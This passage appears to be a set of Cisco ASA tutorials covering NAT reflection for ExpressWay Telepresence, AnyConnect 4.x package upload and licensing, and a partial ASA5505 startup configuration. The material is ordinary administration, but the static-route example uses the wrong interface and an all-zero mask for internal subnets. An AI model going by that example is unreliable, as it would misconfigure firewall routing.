For ASA Versions 8.3 and later:

object network obj-192.168.1.50
host 192.168.1.50

!
object network obj-192.168.5.5
host 192.168.5.5

!
object network obj-203.40.40.5
host 203.40.40.5

!
nat (inside,DMZ) source static obj-192.168.1.50 interface destination static
obj-203.40.40.5 obj-192.168.5.5


WARNING: All traffic destined to the IP address of the DMZ interface is being redirected.
WARNING: Users may not be able to access any service enabled on the DMZ interface.

NOTE: After the NAT command is applied you will receive the two above warning messages.

The last line in our ASA configuration performs Source NAT and Destination NAT in one command.

For ASA Versions 8.2 and earlier:

access-list INT-DMZ-IN extended permit ip host 192.168.1.50 host 203.40.40.5
static (inside,DMZ) interface access-list INT-DMZ-IN

!
access-list INT-DMZ-IN extended permit ip host 192.168.5.5 host 192.168.5.1
static (DMZ,inside) 203.40.40.5 access-list INT-DMZ-IN

As shown, there are two levels of NAT occurring for this scenario, both required by the Cisco Telepresence - ExpressWay infrastructure.

Dual 2-Port/Leg Firewalls DMZ With One LAN Interface ExpressWay-E Server

The second most popular setup involves two firewalls, one protecting our LAN (Firewall 2) and one protecting our DMZ (Firewall 1) while also limiting traffic hitting our LAN firewall:

NAT Reflection on a 2-Port ASA Firewall with DMZ for Cisco Telepresence (ExpressWay-C & ExpressWay-E)

Figure 2. NAT Reflection on a 2-Port ASA Firewall with DMZ for Cisco Telepresence (ExpressWay-C & ExpressWay-E)

In this slightly more complex setup, Firewall No.1 is where we apply NAT Reflection to inbound traffic from ExpressWay-C server destined to ExpressWay-E’s public IP address 203.40.40.5.

It’s important to note that returning traffic from ExpressWay-E to ExpressWay-C will have to pass through Firewall 1 again. If an attempt is made to direct returning traffic through Firewall 2 (bypassing Firewall 1) e.g via a static route, then we’ll have a condition known as Asymmetric Routing, possibly causing disruptions in the communication between the two servers.

Note: Asymmetric Routing occurs when returning traffic between two hosts does not follow the same route as the original traffic. This condition is not favored by Firewalls as they track traffic and expect returning traffic to follow the same path originally taken.

Firewall No.1 is also configured with a one-to-one static NAT mapping, directing all traffic towards 203.40.40.5 to 192.168.5.5.

ExpressWay-C packets traversing ASA Firewall 1 destined to ExpressWay-E’s public IP address will have the following transformation thanks to the NAT Reflection configuration:

  • Destination IP address 203.40.40.5 is replaced with Destination IP address 192.168.5.5ExpressWay-E’s private IP address. This is also known as Destination NAT (DNAT).
  • The Source IP address 192.168.1.50 (ExpressWay-C) is replaced with Source IP address 192.168.5.2Firewall 1’s internal interface IP address. This is also known as Source NAT (SNAT).

Firewall 2 does not perform any NAT for traffic between ExpressWay-C and ExpressWay-E. When ExpressWay-C packets arrive to the ExpressWay-E server, they will have the following source & destination IP address: Source IP: 192.168.5.2, Destination IP: 192.168.5.5

Translation of the source IP address (SNAT) of packets (192.168.1.50 to 192.168.5.2) for this traffic flow is optional however required specifically for the Cisco ExpressWay setup. The configuration commands for the above setup is as follows:

For ASA Versions 8.3 and later:

object network obj-192.168.1.50
host 192.168.1.50

!
object network obj-192.168.5.5
host 192.168.5.5

!
object network obj-203.40.40.5
host 203.40.40.5

!
nat (inside,DMZ) source static obj-192.168.1.50 interface destination static
obj-203.40.40.5 obj-192.168.5.5


WARNING: All traffic destined to the IP address of the DMZ interface is being redirected.
WARNING: Users may not be able to access any service enabled on the DMZ interface.

NOTE: After the NAT command is applied you will receive the two above warning messages.

The last line in our ASA v8.3 and later configuration performs Source NAT and Destination NAT in one command.

For ASA Versions 8.2 and earlier:

access-list INT-DMZ-IN extended permit ip host 192.168.1.50 host 203.40.40.5
static (inside,DMZ) interface access-list INT-DMZ-IN

!
access-list INT-DMZ-IN extended permit ip host 192.168.5.5 host 192.168.5.1
static (DMZ,inside) 203.40.40.5 access-list INT-DMZ-IN

Summary

NAT Reflection (NAT Loopback or Hairpinning) is a fairly new NAT concept to most but as we’ve seen it’s a fairly easy one to understand. Implementations of NAT Reflection are slowly becoming popular due to the new and complex technologies that require this type of NAT functionality – Telepresence and video conferencing being one of them. We covered NAT Reflection for the two most popular Firewall configurations including diagrams and ASA Firewall configuration commands.

  • Hits: 101663

Upgrading - Uploading AnyConnect Secure Mobility Client v4.x SSL VPN on Cisco ASA 5506-X, 5508-X, 5512-X, 5515-X, 5516-X, 5525-X, 5545-X, 5555-X, 5585-X

This article will show how to download and upload the newer AnyConnect 4.x VPN clients to your Cisco ASA Firewall appliance (5500 & 5500-X Series) and configure WebVPN so that the newer AnyConnect VPN client is used and distributed to the remote VPN clients.

The Cisco AnyConnect SSL VPN has become the VPN standard for Cisco equipment, replacing the older Cisco IPSec VPN Client. With the introduction of the newer 4.x AnyConnect, Cisco has made dramatic changes to their licensing and features supported. Our Cisco AnyConnect 4.x Licensing article explains the differences with the newer 4.x licensing and has all the details to help organizations of any size migrate from 3.x AnyConnect to 4.x. You’ll also find the necessary Cisco ordering codes along with their caveats.

cisco-asa-firewall-anyconnect-secure-mobility-4-upgrade-1

Figure 1. Cisco AnyConnect v4.x

The latest AnyConnect client at the time of writing is version 4.2.02075, which is available for Cisco customers with AnyConnect Plus or Apex licenses. Cisco provides both head-end and standalone installer files. The head-end files (.pkg extension) are deployed on the Cisco ASA Firewall and automatically downloaded by the VPN clients once authenticated via the web browser.

Uploading AnyConnect Secure Mobility Packages To The ASA Firewall

Images can be uploaded to the Cisco ASA Firewall via a standard tftp client using the copy tftp flash: command:

ASA-5506X# copy tftp flash:
Address or name of remote host []? 192.168.10.54
Source filename []? anyconnect-win-4.2.02075-k9.pkg
Destination filename [anyconnect-win-4.2.02075-k9.pkg]? [Hit Enter to keep same filename]
Accessing tftp://192.168.10.54/anyconnect-win-4.2.02075-k9.pkg...!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Writing file disk0:/anyconnect-win-4.2.02075-k9.pkg !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
INFO: No digital signature found
 
19426316 bytes copied in 85.820 secs (228544 bytes/sec)

We repeat the same commands until all 3 files have been uploaded so we can fully support Windows, Linux and MAC OS clients.

Using the dir command at the end of the process confirms all files have been successfully uploaded to our ASA Firewall:

ASA-5506X# dir
Directory of disk0:/
97     -rwx 69454656     18:01:00 Aug 04 2015 asa941-lfbff-k8.SPA
98     -rwx 26350916     18:01:34 Aug 04 2015 asdm-741.bin
99     -rwx 33           04:09:03 Feb 27 2016 .boot_string
11     drwx 4096         18:04:04 Aug 04 2015 log
22     drwx 4096         18:05:10 Aug 04 2015 crypto_archive
23     drwx 4096         18:05:30 Aug 04 2015 coredumpinfo
100   -rwx 41836544     18:10:02 Aug 04 2015 asasfr-5500x-boot-5.4.1-211.img
103   -rwx 19426316     06:58:37 Feb 27 2016 anyconnect-win-4.2.02075-k9.pkg
104   -rwx 12996288     07:01:17 Feb 27 2016 anyconnect-linux-64-4.2.02075-k9.pkg
105   -rwx 17519719     07:04:26 Feb 27 2016 anyconnect-macosx-i386-4.2.02075-k9.pkg
7859437568 bytes total (4448530432 bytes free)
 
ASA-5506X#

Registering The New AnyConnect Packages

Assuming AnyConnect is already configured on your ASA Firewall, registering the new packages is a very simple process. In the near future, we’ll be including a full guide on how to setup AnyConnect Secure Mobility on Cisco ASA Firewalls.

Enter configuration mode and in the webvpn section add the following commands:

ASA-5506X(config)# webvpn
ASA-5506X(config-webvpn)# anyconnect image disk0:/anyconnect-win-4.2.02075-k9.pkg 1
ASA-5506X(config-webvpn)# anyconnect image disk0:/anyconnect-linux-64-4.2.02075-k9.pkg 2
ASA-5506X(config-webvpn)# anyconnect image disk0:/anyconnect-macosx-i386-4.2.02075-k9.pkg 3
ASA-5506X(config-webvpn)# anyconnect enable

When dealing with multiple clients (supported platforms) of AnyConnect, assign an order to the client images using the numbers (1, 2, 3) at the end of each package command as shown above.

Previous versions of AnyConnect packages (.pkg) can be removed from the configuration by using the no anyconnect image disk0:/anyconnect-win-xxxxx-k9.pkg command.

Verifying The New AnyConnect Packages

As a final step, we can verify that the AnyConnect packages have been successfully installed using the show webvpn anyconnect command:

ASA-5506X# show webvpn anyconnect
 
1. disk0:/anyconnect-win-4.2.02075-k9.pkg 1 dyn-regex=/Windows NT/
CISCO STC win2k+
4,2,02075
Hostscan Version 4.2.02075
Wed 02/17/2016 23:34:33.75
 
2. disk0:/anyconnect-linux-64-4.2.02075-k9.pkg 2 dyn-regex=/Linux x86_64/
CISCO STC Linux_64
4.2.02075
Wed Feb 17 23:03:53 EST 2016
 
3. disk0:/anyconnect-macosx-i386-4.2.02075-k9.pkg 3 dyn-regex=/Intel Mac OS X/
CISCO STC Darwin_i386
4.2.02075
Wed Feb 17 23:59:03 EST 2016
 
3 AnyConnect Client(s) installed

This completes the upgrade process of AnyConnect Secure Mobility Client on an ASA Firewall Security appliance. We saw all CLI commands involved to upload and register the new AnyConnect packages, remove the old AnyConnect packages and finally verify the packages are correctly registered for usage.

  • Hits: 61528

Demystifying Cisco AnyConnect 4.x Licensing. Plus, Plus Perpetual, Apex & Migration Licenses for Cisco IOS Routers & ASA Firewalls (5500/5500-X Series). Supported Operating Systems & Ordering Guide

cisco-anyconnect-license-plus-perpetual-apex-essential-premium-ssl-mobility-vpn-01aIn late 2014, Cisco announced the new licensing model for the latest AnyConnect Secure Mobility client v4.x. With this new version, Cisco introduced a number of new features, but also simplified the licensing model which was somewhat confusing. In this article, we will take a look at the new AnyConnect 4.x licenses which consist of: AnyConnect Plus license, AnyConnect Plus Perpetual license and AnyConnect Apex license.
 
We will also show how the new licenses map to the older AnyConnect Essentials and AnyConnect Premium license, plus the available migration paths. Finally, we also take a look at Cisco’s Software Application Support (SAS) and Software Application Support plus Upgrade (SASU), which are required when purchasing AnyConnect.

All AnyConnect licenses prior to version 4 had the AnyConnect Essentials and Premium licensing scheme. The newer v4.x AnyConnect licenses now have one of the three licensing options:

  • Cisco AnyConnect Plus License (Subscription Based)
  • Cisco AnyConnect Plus Perpetual License (Permanent – no subscription)
  • Cisco AnyConnect Apex License (Subscription Based)

With the new AnyConnect licenses, Cisco has moved to a subscription-based licensing model which means customers will unfortunately need to fork out more money in the long run.  The Plus Perpetual License on the other hand allows Cisco customers to purchase a one-time license, however the license costs significantly higher than the subscription-based license.

We should also note that AnyConnect 4.0 is not licensed based on simultaneous connections (like the previous AnyConnect 3.x), but is now user-based. This means a user connecting via his smartphone and laptop simultaneously will only occupy a single license.

Since the newer AnyConnect licenses are subscription-based, according to Cisco, if their subscription expires and is not renewed, they will stop working.
 
Cisco AnyConnect Secure Mobility Client 4.0 supports the following operating systems:

  • Windows 8.1 (32bit & 64Bit)
  • Windows 8 (32bit & 64Bit)
  • Windows 7 (32bit & 64Bit)
  • Linux Ubuntu 12.X 64Bit
  • Linux RedHat 6 64Bit
  • Mac OS X 10.10 – 10.8

As expected, Windows XP is no longer supported.

Let’s take a look at each license feature and how the older AnyConnect Essentials and Premium licenses map to the newer AnyConnect Plus and Apex licenses:

cisco-anyconnect-license-plus-perpetual-apex-essential-premium-ssl-mobility-vpn-01

Figure 1. Mapping AnyConnect 3.x Essentials & Premium to AnyConnect 4.x Plus & Apex

Related AnyConnect Articles on Firewall.cx:

Cisco AnyConnect Plus License (Old Essentials License) 5, 3 or 1-Year Term

The AnyConnect Plus License is a subscription-based license with the option of a 5, 3 or 1-year renewable subscription and supports the following features:

  • VPN Support for Devices. Includes Workstations and Laptops.
  • Secure Mobility Client support (AnyConnect Mobile). Includes mobile phones, tablets etc.
  • SSL VPN (Client-based)
  • Per-app VPN. Authorize specific applications access the VPN.  Supports specific devices and software.
  • Basic endpoint context collection
  • IEEE 802.1X Windows supplicant
  • Cisco Cloud Web Security agent for Windows & Mac OS X platforms
  • Cloud Web Security and Web Security Appliance support
  • Cisco Advanced Malware Protection for Endpoints Enabler. AMP for Endpoints is licensed separately
  • Network Access Manager
  • Federal Information Processing Standards (FIPS) Compliance

It is worth noting that AnyConnect 3.x required the purchase of Essentials or Premium license + AnyConnect Mobile (L-ASA-AC-M-55xx) in order to support mobile devices (Smartphones, Tablets etc.).  AnyConnect Mobile is now integrated into the new AnyConnect Plus license.

Cisco AnyConnect Plus Perpetual (permanent) License

The AnyConnect Plus Perpetual license supports the same features as the Plus license above, but with the difference that it is a permanent license.
 
The customer purchases it once and does not have any subscription services, however it is still required to purchase a software application support plus upgrade (SASU) contract. This is covered in detail at the end of this article.

Customers considering the Plus Perpetual license should compare costs with the subscription-based license to see if it is worth going down that path.

Cisco AnyConnect Apex License (Old Premium License)

The AnyConnect Apex License includes all offerings in the AnyConnect Plus license plus the following:

  • All AnyConnect Plus features
  • Clientless (browser-based) VPN Termination on the Cisco ASA Firewall appliance
  • VPN compliance and posture agent in conjunction with the Cisco ASA Firewall appliance
  • Unified compliance and posture agent in conjunction with the Cisco Identity Services Engine (ISE) 1.3 or later
  • Support for stronger Next-generation encryption (Suite B)

The AnyConnect Apex license is only available as a subscription-based license. There is no perpetual license available.
 
The Next Generation Suite B encryption supports the following stronger encryption standards:

  • Advanced Encryption Standard (AES) with key sizes of 128 and 256 bits.
  • Elliptic Curve Digital Signature Algorithm (ECDSA) — digital signatures
  • Elliptic Curve Diffie–Hellman (ECDH) — key exchange agreement
  • Secure Hash Algorithm 2 (SHA-256 and SHA-384) — message digest

Purchasing AnyConnect Licenses & Important Notes – Understand SAS & SASU For AnyConnect

While AnyConnect licensing has been simplified, there are still a few important areas we must be aware of to avoid licensing and future upgrade issues.

Before we dive in, we need to clarify what Software Application Support (SAS) and Software Application Support plus Upgrade (SASU) is because they are required with AnyConnect licenses:

SAS:  Provides access to Cisco’s latest software application updates (e.g AnyConnect, VPN Client software). SAS also includes minor release updates (e.g. AnyConnect 4.0 to 4.1 upgrade) and 24-hour technical assistance from Cisco TAC (Only for the specific software/application) and unrestricted access to online tools.

SASU: Includes everything provided in SAS, plus major upgrade release of the software e.g from AnyConnect 4.x to AnyConnect 5.x (when available).

When purchasing AnyConnect Plus or AnyConnect Apex subscription-based licenses, SASU is already included and is not required to be purchased separately.
 
When purchasing AnyConnect Plus Perpetual licenses, SASU must be purchased.  To do so, you need to order the following:

  1. Order the Cisco AnyConnect Plus Perpetual License (L-AC-PLS-P-G) which has no cost ($0)
  2. Add the User License required e.g Cisco AnyConnect Plus - Perpetual License/25 users (AC-PLS-P-25-S)
  3. Add the SASU product for the selected User License (AC-PLS-P-25-S). In our example the SASU product will be CON-SAU-ACPL25. It is also necessary to specify the duration of the contract (1 – 60 months). The longer the duration, the larger the cost.

Full product ID’s for AnyConnect Plus, Plus Perpetual and Apex licenses along with all subscriptions and SASU products are available in the Cisco AnyConnect Ordering Guide freely available from our Cisco Product Datasheets & Guides section.

Below we are including a list of the maximum VPN peers/sessions supported by each ASA Firewall appliance to help customers decide the amount of AnyConnect licenses they require:

Cisco ASA Maximum VPN Peers / Sessions

5505 = 25
5510 = 250
5520 = 750
5540 = 5,000
5550 = 5,000
5580 = 10,000

Cisco ASA Next Generation Platform (X) VPN Peers / Sessions

5512-X = 250
5515-X = 250
5525-X = 750
5545-X = 2,500
5555-X = 5,000
5585-X = 10,000

Cisco AnyConnect Plus, AnyConnect Apex Migration Licenses

Cisco customers who purchased AnyConnect Essentials, Premium and Shared Premium licenses prior to March 2 2015, can transition to the new Plus/Apex licenses by ordering the Plus/Apex Migration subscription licenses for 5, 3 or 1-year term.

The last day to purchase AnyConnect Migration licenses is 31st of December 2015.

The AnyConnect Migration license product IDs are available in the Cisco AnyConnect Ordering Guide freely available from our Cisco Product Datasheets & Guides section.

This article explained the new Cisco AnyConnect 4.x licensing model. We analysed the three new simplified licensing options AnyConnect Plus, Plus Perpetual and AnyConnect Apex, including the features each license supports and how they map to the old Essentials and Premium licenses. We covered the operating systems supported by AnyConnect 4.x, ordering product IDs and analysed the SASU services required with AnyConnect Perpetual  licenses, AnyConnect Migration licenses while also noting the maximum VPN sessions supported by all available ASA Firewall appliances.

  • Hits: 134910

Cisco ASA5500 (5505, 5510, 5520, etc) Series Firewall Security Appliance Startup Configuration & Basic Concepts

cisco-asa5500-basic-config-1The Cisco ASA 5500 series security appliances have been around for quite some time and are amongst the most popular hardware firewalls available in the market. Today Firewall.cx takes a look at how to easily setup a Cisco ASA5500 series firewall to perform basic functions, more than enough to provide secure & restricted access to the Internet, securely access and manage the ASA Firewall and more.

While many consider the Cisco ASA Firewalls complex and difficult to configure devices, Firewall.cx aims to break that myth and show how easy you can setup an ASA Firewall to deliver basic and advanced functionality. We’ve done it with other Cisco technologies and devices, and we’ll do it again :)

The table below provides a brief comparison between the different ASA5500 series security appliances:

Feature

Cisco ASA 5505

Cisco ASA 5510

Cisco ASA 5520

Cisco ASA 5540

Cisco ASA 5550

Users/Nodes

10, 50, or unlimited

Unlimited

Unlimited

Unlimited

Unlimited

Firewall Throughput

Up to 150 Mbps

Up to 300 Mbps

Up to 450 Mbps

Up to 650 Mbps

Up to 1.2 Gbps

Maximum Firewall and IPS Throughput

• Up to 150 Mbps with AIP-SSC-5

• Up to 150 Mbps with AIP-SSM-10

• Up to 300 Mbps with AIP-SSM-20

• Up to 225 Mbps with AIP-SSM-10

• Up to 375 Mbps with AIP-SSM-20

• Up to 450 Mbps with AIP-SSM-40

• Up to 500 Mbps with AIP-SSM-20

• Up to 650 Mbps with AIP-SSM-40

Not available

3DES/AES VPN Throughput***

Up to 100 Mbps

Up to 170 Mbps

Up to 225 Mbps

Up to 325 Mbps

Up to 425 Mbps

IPsec VPN Peers

10; 25

250

750

5000

5000

Premium AnyConnect VPN Peers* (Included/Maximum)

2/25

2/250

2/750

2/2500

2/5000

Concurrent Connections

10,000; 25,000*

50,000; 130,000*

280,000

400,000

650,000

New Connections/Second

4000

9000

12,000

25,000

33,000

Integrated Network Ports

8-port Fast Ethernet switch (including 2 PoE ports)

5 Fast Ethernet ports; 2 Gigabit Ethernet + 3 Fast Ethernet ports*

4 Gigabit Ethernet, 1 Fast Ethernet

4 Gigabit Ethernet, 1 Fast Ethernet

8 Gigabit Ethernet, 4 SFP Fiber, 1 Fast Ethernet

Virtual Interfaces (VLANs)

3 (no trunking support)/20 (with trunking support)*

50/100*

150

200

400

Users can also download the complete technical datasheet for the Cisco ASA 5500 series firewalls by visiting our Cisco Product Datasheet & Guides Download section.

Perhaps one of the most important points, especially for an engineer with limited experience, is that configuring the smaller ASA 5505 Firewall does not really differ from configuring the larger ASA5520 Firewall. The same steps are required to setup pretty much all ASA 5500 series Firewalls – which is Great News!

cisco-asa5500-basic-config-2

The main differences besides the licenses, which enable or disable features, are the physical interfaces of each ASA model (mainly between the ASA 5505 and the larger 5510/5520) and possibly modules that might be installed. In any case, we should keep in mind that if we are able to configure a small ASA5505 then configuring the larger models won’t be an issue.

At the time of writing of this article Firewall.cx came across a Cisco ASA5505, so we decided to put it to good use for this article, however, do note that all commands and configuration philosophy is the same across all ASA5500 series security appliances.

Note: ASA software version 8.3.0 and above use different NAT configuration commands. This article provides both old style (up to v8.2.5) and new style (v8.3 onwards) NAT configuration commands.

ASA5500 Series Configuration Check-List

We’ve created a simple configuration check-list that will help us keep track of the configured services on our ASA Firewall. Here is the list of items that will be covered in this article:

  • Erase existing configuration
  • Configure Hostname, Users, Enable password & Disable Anonymous Reporting
  • Configure interface IP addresses or Vlan IP addresses (ASA5505) & Descriptions
  • Setup Inside (private) & Outside (public) Interfaces
  • Configure default route (default Gateway) & static routes
  • Configure Network Address Translation (NAT) for Internal Networks
  • Configure ASA DHCP Server
  • Configure AAA authentication for local database user authentication
  • Enable HTTP Management for inside interface
  • Enable SSH & Telnet Management for inside and outside interfaces
  • Create, configure and apply TCP/UDP Object-Groups to firewall access lists
  • Configuration of access-lists for ICMP packets to the Internet
  • Apply Firewall access lists to ‘inside’ and ‘outside’ interfaces
  • Configure logging/debugging of events and errors

Note: it is highly advisable to frequently save the ASA configuration to ensure no work is lost in the event of a power failure or accident restart.

Saving the configuration can be easily done using the write memory command:

ASA5505(config)# write memory
Building configuration...
Cryptochecksum: c0aee665 598d7cd3 7fbfe1a5 a2d40ab1
3270 bytes copied in 1.520 secs (3270 bytes/sec)
[OK]

Erasing Existing Configuration

This first step is optional as it will erase the firewall’s configuration. If the firewall has been previously configured or used it is a good idea to start off with the factory defaults. If we are not certain, we prefer to wipe it clean and start from scratch.

Once the configuration is deleted we need to force a reboot, however, take note that it’s important not to save the system config to ensure the running-config is not copied to the startup-config otherwise we’ll have to start this process again:

ciscoasa(config)# write erase
Erase configuration in flash memory? [confirm]
[OK]
ciscoasa(config)# reload
System config has been modified. Save? [Y]es/[N]o:  N
Proceed with reload? [confirm]
ciscoasa(config)#
***
*** --- START GRACEFUL SHUTDOWN ---
Shutting down isakmp
Shutting down webvpn
Shutting down File system
***
*** --- SHUTDOWN NOW ---
Process shutdown finished
Rebooting.....

Configure Hostname, Users, 'Enable' Password & Disable Anonymous Reporting

Next, we need to configure the Enable password, required for privileged exec mode access, and then user accounts that will have access to the firewall. 

The ASA Firewall won’t ask for a username/password when logging in next, however, the default enable password of ‘cisco’, will be required to gain access to privileged mode:

Ciscoasa> enable
Password: cisco
ciscoasa#  configure terminal
ciscoasa(config)#
***************************** NOTICE *****************************
Help to improve the ASA platform by enabling anonymous reporting,
which allows Cisco to securely receive minimal error and health
information from the device. To learn more about this feature,
please visit: http://www.cisco.com/go/smartcall

Would you like to enable anonymous error reporting to help improve
the product? [Y]es, [N]o, [A]sk later: N

In the future, if you would like to enable this feature,
issue the command "call-home reporting anonymous".
Please remember to save your configuration.

At this point we need to note that when starting off with the factory default configuration, as soon as we enter the ‘configure terminal’ command, the system will ask if we would like to enable Cisco’s call-home reporting feature. We declined the offer and continued with our setup:

ciscoasa(config)# hostname ASA5505
ASA5505(config)# enable password firewall.cx
ASA5505(config)# username admin password s1jw$528ds2 privilege 15

The privilege 15 parameter at the end of the command line ensures the system is aware that this is an account with full privileges and has access to all configuration commands including erasing the configuration and files on the device’s flash disk, such as the operating system.

Configure Interface IP addresses / VLAN IP Addresses & Descriptions

Depending on the ASA appliance we have, we can configure physical interfaces (inside/outside) with IP addresses, usually done with ASA5510 and larger models,  or create VLANs (inside/outside) and configure them with IP addresses, usually with the smaller ASA5505 models.

In many cases network engineers use VLAN interfaces on the larger ASA5500 models, however, this depends on the licensing capabilities of the device, existing network setup and more.

In the case of the ASA5505 we must use VLAN interfaces, which are configured with their appropriate IP addresses and then (next step) characterised as inside (private) or outside (public) interfaces:

ASA5505(config)# interface vlan 1
ASA5505(config)# description Private-Interface
ASA5505(config-if)# ip address 10.71.0.1 255.255.255.0
ASA5505(config-if)# no shutdown
!
ASA5505(config)# interface vlan 2
ASA5505(config)# description Public-Interface
ASA5505(config-if)# ip address 192.168.3.50 255.255.255.0
ASA5505(config-if)# no shutdown
!
ASA5505(config)# interface ethernet 0/0
ASA5505(config-if)# switchport access vlan 2
ASA5505(config-if)# no shutdown
Alternatively, the Public interface  (VLAN2) can be configured to obtain its IP address automatically via DHCP with the following command:
ASA5505(config)# interface vlan 2
ASA5505(config)# description Public-Interface
ASA5505(config-if)# ip address dhcp setroute
ASA5505(config-if)# no shutdown

The setroute parameter at the end of the command will ensure the ASA Firewall sets its default route (gateway) using the default gateway parameter the DHCP server provides.

After configuring VLAN1 & VLAN2 with the appropriate IP addresses, we configured ethernet 0/0 as an access link for VLAN2 so we can use it as a physical public interface.  Out of the 8 total Ethernet interfaces the ASA5505 has, at least one must be set with the switchport access vlan 2 otherwise there won’t be any physical public interface on the ASA for our frontend router to connect to. Ethernet ports 0/1 to 0/7 must also be configured with the no shutdown command in order make them operational. All of these ports are, by default, access links for VLAN1. Provided are the configuration commands for the first two ethernet interface as the configuration is identical for all:

ASA5505(config)# interface ethernet 0/1
ASA5505(config-if)# no shutdown
ASA5505(config-if)# interface ethernet 0/2
ASA5505(config-if)# no shutdown

Setup Inside (private) & Outside (public) Interfaces

Next, we must designate the Inside (private) and Outside (public) interfaces. This step is essential and will help the ASA Firewall understand which interface is connected to the trusted (private) and untrusted (public) network:

ASA5505(config)# interface vlan 1
ASA5505(config-if)# nameif inside
INFO: Security level for "inside" set to 100 by default.
!
ASA5505(config)# interface vlan 2
ASA5505(config-if)# nameif outside
INFO: Security level for "outside" set to 0 by default.

The ASA Firewall will automatically set the security level to 100 for inside interfaces and 0 to outside interfaces.  Traffic can flow from higher security levels to lower (private to public), but not the other way around (public to private) unless stated by an access-lists. 

To change the security-level of an interface use the security-level xxx command by substituting xxx with a number from 0 to 100. The higher the number, the higher the security level.  DMZ interfaces are usually configured with a security level of 50.

It is extremely important the necessary caution is taken when selecting and applying the inside/outside interfaces on any ASA Firewall.

Configure Default Route (default gateway) & Static Routes

The default route configuration command is necessary for the ASA Firewall to route packets outside the network via the next hop, usually a router. In case the public interface (VLAN2) is configured using the ip address dhcp setroute command, configuration of the default gateway is not required.

ASA5505(config)# route outside 0.0.0.0 0.0.0.0 192.168.3.1 
At this point, it’s a good idea to try testing the next-hop router and confirm the ASA Firewall can reach it:
ASA5505(config)# ping 192.168.3.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.3.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms

For networks with multiple internal VLANs, it is necessary to configure static routes to ensure the ASA Firewall knows how to reach them. Usually these networks can be reached via a Layer3 switch or an internal router.  For our example, we’ll assume we have two networks: 10.75.0.0/24 & 10.76.0.0/24 which we need to provide Internet access to. These additional networks are contactable via a Layer3 device with IP address 10.71.0.100:

ASA5505(config)# route outside 10.75.0.0 0.0.0.0 10.71.0.100
ASA5505(config)# route outside 10.76.0.0 0.0.0.0 10.71.0.100

Configure Network Address Translation (NAT) For Internal Networks

This is the last step required to successfully provide Internet access to our internal networks. Network Address Translation is essential to masquerade our internal network using the single IP address our Public interface has been configured with.  Network Address Translation, along with all its variations (Static, Dynamic etc), is covered in great depth in our popular Network Address Translation section.

We should note at this point that NAT configuration has slightly changed with ASA software version 8.3 and above. We will provide both commands to cover installations with software version up to v8.2.5 and from v8.3 and above.

The following commands apply to ASA appliances with software version up to 8.2.5:

ASA5505(config)# global (outside) 1 interface
INFO: outside interface address added to PAT pool
ASA5505(config)# nat (inside) 1 10.71.0.0 255.255.255.0
ASA5505(config)# nat (inside) 1 10.75.0.0 255.255.255.0
ASA5505(config)# nat (inside) 1 10.76.0.0 255.255.255.0

In the above configuration, the ASA Firewall is instructed to NAT all internal networks using the NAT Group 1. The number ‘1’ is used to identify the NAT groups for the NAT process between the inside and outside interfaces.

The global (outside) 1 interface command instructs the ASA Firewall to perform NAT using the IP address assigned to the outside interface.

Another method of configuring NAT is with the use of access lists. In this case, we define the internal IP addresses to be NAT’ed with the use of access lists:

ASA5505(config)# access-list NAT-ACLs extended permit ip 10.71.0.0 255.255.255.0 any
ASA5505(config)# access-list NAT-ACLs extended permit ip 10.75.0.0 255.255.255.0 any
ASA5505(config)# access-list NAT-ACLs extended permit ip 10.76.0.0 255.255.255.0 any
ASA5505(config)# global (outside) 1 interface
INFO: outside interface address added to PAT pool
ASA5505(config)# nat (inside) 1 access-list NAT-ACLs

NAT with the use of access lists provides greater flexibility and control which IP addresses or networks will use the NAT service.

With software version 8.3 and newer, things have changed dramatically and there are no more access lists in NAT configuration lines.

The new NAT format now utilizes "object network", "object service" and "object-group network" to define the parameters of the  NAT  configuration.

The following commands (software version 8.3 and above) will provide NAT services to our internal networks so they can access the Internet:

ASA5505(config)# object network network1
ASA5505(config-network-object)# subnet 10.71.0.0 255.255.255.0
ASA5505(config-network-object)# nat (inside,outside) dynamic interface
!
ASA5505(config)# object network network2
ASA5505(config-network-object)# subnet 10.75.0.0 255.255.255.0
ASA5505(config-network-object)# nat (inside,outside) dynamic interface
!
ASA5505(config)# object network network3
ASA5505(config-network-object)# subnet 10.76.0.0 255.255.255.0
ASA5505(config-network-object)# nat (inside,outside) dynamic interface

Configuring The ASA DHCP Server

The existence of a DHCP server is necessary in most cases as it helps manage the assignment of IP address to our internal hosts. The ASA Firewall can be configured to provide DHCP services to our internal network, a very handy and welcome feature.

Again, there are some limitations with the DHCP service configuration which vary with the ASA model used. In our ASA5505, the maximum assigned IP addreses for the DHCP pool was just 128!

Note that the DHCP service can run on all ASA interfaces so it is necessary to specify which interface the DHCP configuration parameters are for:

ASA5505(config)# dhcpd address 10.71.0.50-10.71.0.200 inside
Warning, DHCP pool range is limited to 128 addresses, set address range as: 10.71.0.50-10.71.0.177
ASA5505(config)# dhcpd address 10.71.0.50-10.71.0.128 inside
ASA5505(config)# dhcpd dns 8.8.8.8 interface inside

Once configured, the DHCP service will begin working and assigning IP addresses to the clients. The Gateway IP address parameter is automatically provided to client and is not required to be configured on the ASA Firewall appliance.

We can verify the DHCP service is working using the show dhcpd statistics command:

ASA5505(config)# show dhcpd statistics
DHCP UDP Unreachable Errors: 0
DHCP Other UDP Errors: 0
Address pools        1
Automatic bindings   1
Expired bindings     0
Malformed messages   0

 Message          Received
 BOOTREQUEST          0
 DHCPDISCOVER         1
 DHCPREQUEST          1
 DHCPDECLINE          0
 DHCPRELEASE          0
 DHCPINFORM           1

If required, we can clear the DHCP bindings (assigned IP addresses) using the clear dhcpd binding command.

Configure AAA Authentication For Local Database User Authentication

Configuring AAA authentication is always a good idea as it instructs the ASA Firewall to use the local user database for the various services it's running. For example, we can tell the ASA Firewall to use a radius server for VPN user authentication, but use its local database for telnet, ssh or HTTP (ASDM) management access to the Firewall appliance.

As mentioned, our example instructs the ASA Firewall to use its local database:

ASA5505(config)# aaa authentication telnet console LOCAL
ASA5505(config)# aaa authentication http console LOCAL
ASA5505(config)# aaa authentication ssh console LOCAL

Enable HTTP Management For Inside Interface

We now turn to the management settings of our ASA Firewall to enable and configure HTTP management. This will allow access to the Firewall’s management via the popular ASDM management application:

ASA5505(config)# http 10.71.0.0 255.255.255.0 inside
